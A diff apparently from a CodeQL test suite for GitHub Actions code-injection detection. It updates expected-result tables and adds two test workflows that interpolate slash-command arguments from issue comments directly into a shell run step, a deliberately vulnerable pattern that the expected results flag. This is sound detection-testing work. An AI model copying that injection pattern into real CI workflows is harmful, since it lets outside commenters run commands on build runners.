.github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -695,43 +709,45 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -750,6 +766,7 @@ dfNodes | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | usesIds | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | @@ -811,43 +828,45 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:24:43 | .github/workflows/poisonable_steps.yml@5:5:24:43 | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:29:43 | .github/workflows/poisonable_steps.yml@5:5:29:43 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:14:8:32 | .github/workflows/poisonable_steps.yml@8:14:8:32 | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:9:10:6 | .github/workflows/poisonable_steps.yml@9:9:10:6 | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:14:9:42 | .github/workflows/poisonable_steps.yml@9:14:9:42 | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:9:11:6 | .github/workflows/poisonable_steps.yml@10:9:11:6 | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:14:10:41 | .github/workflows/poisonable_steps.yml@10:14:10:41 | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:9:12:6 | .github/workflows/poisonable_steps.yml@11:9:12:6 | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:14:11:42 | .github/workflows/poisonable_steps.yml@11:14:11:42 | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:9:13:6 | .github/workflows/poisonable_steps.yml@12:9:13:6 | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:14:12:32 | .github/workflows/poisonable_steps.yml@12:14:12:32 | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:14:13:36 | .github/workflows/poisonable_steps.yml@13:14:13:36 | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:14:14:44 | .github/workflows/poisonable_steps.yml@14:14:14:44 | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:14:15:56 | .github/workflows/poisonable_steps.yml@15:14:15:56 | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:14:16:56 | .github/workflows/poisonable_steps.yml@16:14:16:56 | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:14:17:40 | .github/workflows/poisonable_steps.yml@17:14:17:40 | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:14:18:50 | .github/workflows/poisonable_steps.yml@18:14:18:50 | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:14:19:29 | .github/workflows/poisonable_steps.yml@19:14:19:29 | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:14:20:73 | .github/workflows/poisonable_steps.yml@20:14:20:73 | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:9:24:43 | .github/workflows/poisonable_steps.yml@24:9:24:43 | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:14:24:42 | .github/workflows/poisonable_steps.yml@24:14:24:42 | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:9:29:43 | .github/workflows/poisonable_steps.yml@29:9:29:43 | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -868,7 +887,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | @@ -892,6 +911,7 @@ sources | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | | marocchino/on_artifact | * | output.* | artifact | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | +| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | @@ -902,7 +922,6 @@ sources | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | -| xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | @@ -992,6 +1011,7 @@ summaries | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | calls +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | | .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml new file mode 100644 index 00000000000..adca4bc90ff --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml @@ -0,0 +1,21 @@ +name: Test +on: issue_comment +permissions: + issues: write + +jobs: + test: + if: startsWith(github.event.comment.body, '/benchmark') + runs-on: benchmarks + steps: + - name: Check for Command + id: command + uses: xt0rted/slash-command-action@v2 + with: + command: benchmark + reaction-type: "eyes" + repo-token: ${{ env.GH_TOKEN }} + + - run: echo "${{ steps.command.outputs.command-arguments }}" + + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml new file mode 100644 index 00000000000..5422ac4e987 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -0,0 +1,21 @@ +name: Test +on: issue_comment +permissions: + issues: write + +jobs: + test: + if: startsWith(github.event.comment.body, '/benchmark') + runs-on: benchmarks + steps: + - name: Check for Command + id: command + uses: xt0rted/slash-command-action@v2 + with: + command: benchmark + reaction-type: "eyes" + repo-token: ${{ env.GH_TOKEN }} + permission-level: read + + - run: echo "${{ steps.command.outputs.command-arguments }}" + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 16119dd6453..6dfb91f7275 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -59,6 +59,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | provenance | | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | @@ -237,6 +238,8 @@ nodes | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | @@ -357,6 +360,7 @@ subpaths | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d0834f0dff8..11036e7f8eb 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -59,6 +59,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | provenance | | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | @@ -237,6 +238,8 @@ nodes | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | 